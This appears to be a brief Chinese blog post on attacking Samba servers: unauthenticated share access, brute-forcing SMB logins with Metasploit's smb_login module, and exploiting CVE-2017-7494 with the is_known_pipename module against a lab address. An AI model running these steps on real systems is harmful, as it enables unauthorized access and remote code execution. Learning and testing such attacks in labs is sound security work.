Samba常见漏洞利用
2024-09-05 06:27:41
Samba简介
Samba是linux和unix系统上实现smb协议的一个免费软件,由服务器及客户端程序构成,Samba是面向Linux和Unix环境的Windows互操作性套件。它适用于在可能包括Linux、Unix、Windows、macOS及其他操作系统的异构环境下工作的那些人。Samba使用服务器消息块(SMB)协议,Windows系统使用该协议相互联系。使用Samba,你可以让Linux系统将驱动器映射到Windows系统,可以让Windows系统将驱动器映射到Linux系统,不过后者的可能性大得多。Samba让你可以在Linux系统上模拟文件和打印服务。
未授权访问
在samba服务未设置用户名及密码的情况下,可以直接在文件资源管理器访问samba地址
暴力破解
use auxiliary/scanner/smb/smb_login
auxiliary(smb_login) > show options
auxiliary(smb_login) > set RHOST 192.168.109.134
auxiliary(ssmb_login) > set USER_FILE /root/username.txt
auxiliary(ssmb_login) > set PASS_FILE /root/pass.txt
auxiliary(ssmb_login) > exploit
远程代码执行漏洞(CVE-2017-7494 )
CVE-2017-7494影响范围为Samba 3.5.0到4.6.4/4.5.10/4.4.14的中间版本。
exploit/linux/samba/is_known_pipename
set RHOST 192.168.109.134
exploit
最新文章
- 【原】Github+Hexo+NextT搭建个人博客
- SAP(ABAP) 显示等待图标的FM:SAPGUI_PROGRESS_INDICATOR-SAP进度条
- JSTL 的 if else : 有 c:if 没有 else 的处理
- iOS- 详解文本属性Attributes
- Retry Pattern
- Android- Context理解
- poj 2406Power Strings
- STM8S---IO复用配置(STVP方式)
- Maven编译中的一些坑
- redux&;&;createStore
- pytorch入门之安装和配置
- 转载:JAVA序列化与反序列化 (作者:YSOcean)
- 使用SpringBoot的优势。
- 使用DirectX作渲染过程
- C# socket 发送图片和文件
- 移动距离|2015年蓝桥杯B组题解析第八题-fishers
- ruby:TypeError: 对象不支持此属性或方法(<;%= stylesheet_link_tag &#39;application&#39;, media: &#39;all&#39;, &#39;data-turbolink)
- 使用 Maven 管理项目
- kvm增加硬盘挂载
- socket编程之select(),poll(),epoll()